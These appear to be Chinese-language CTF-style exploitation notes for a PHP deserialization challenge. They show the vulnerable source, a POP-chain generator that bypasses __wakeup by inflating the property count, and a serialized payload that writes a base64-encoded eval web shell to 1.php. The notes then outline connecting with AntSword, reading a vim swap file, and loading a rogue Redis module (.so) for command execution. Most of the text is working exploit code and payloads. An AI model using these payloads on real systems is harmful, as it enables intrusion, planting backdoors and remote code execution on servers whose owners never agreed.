利用脚本
https://github.com/Dliv3/redis-rogue-server
antsword插件
https://github.com/Medicean/AS_Redis?tab=readme-ov-file#%E5%B7%B2%E7%9F%A5%E9%97%AE%E9%A2%98
<?php
class A{
public $code = "";
function __call($method,$args){
eval($this->code);
}
function __wakeup(){
$this->code = "";
}
}
class B{
function __destruct(){
echo $this->a->a();
}
}
if(isset($_REQUEST['poc'])){
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
unserialize($_REQUEST['poc']);
}
}else{
highlight_file(__FILE__);
}
<?php
class a{
public function __construct() {
$this->code= "phpinfo();";
}
public $code = "";
}
class b{
public function __construct() {
$this->a = new A();
}
public function __destruct(){
echo $this->a->a();//方法未定义,call函数被调用
}
}
$a=new b();
echo serialize($a);
//O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}
//O:1:"b":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:10:"phpinfo();";}}
//修改类的成员变量数大于类的实际成员变量绕过wakeup函数
查看禁用函数disable_functions
fopen和fputs没有被禁用,写🐎
<?php
$payload=base64_encode('<?php @eval($_POST["123"]);');
class a{
public function __construct() {
global $payload;
$this->code= "fputs(fopen('1.php','w+'),"."base64_decode(\"".$payload."\"));";
}
public $code = "";
}
class b{
public function __construct() {
$this->a = new A();
}
public function __destruct(){
echo $this->a->a();
}
}
$a=new b();
echo serialize($a);
//O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:81:"fputs(fopen('1.php','w+'),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyIxMjMiXSk7"));";}}
//O:1:"b":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:81:"fputs(fopen('1.php','w+'),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyIxMjMiXSk7"));";}}antsword连一下
vim -r config.php.swp 查看swp文件
redis默认端口6379
在html目录下新建456目录,然后把.so文件传上去
antsword加载插件->数据管理->redis管理,输入密码连接上去,执行一波指令
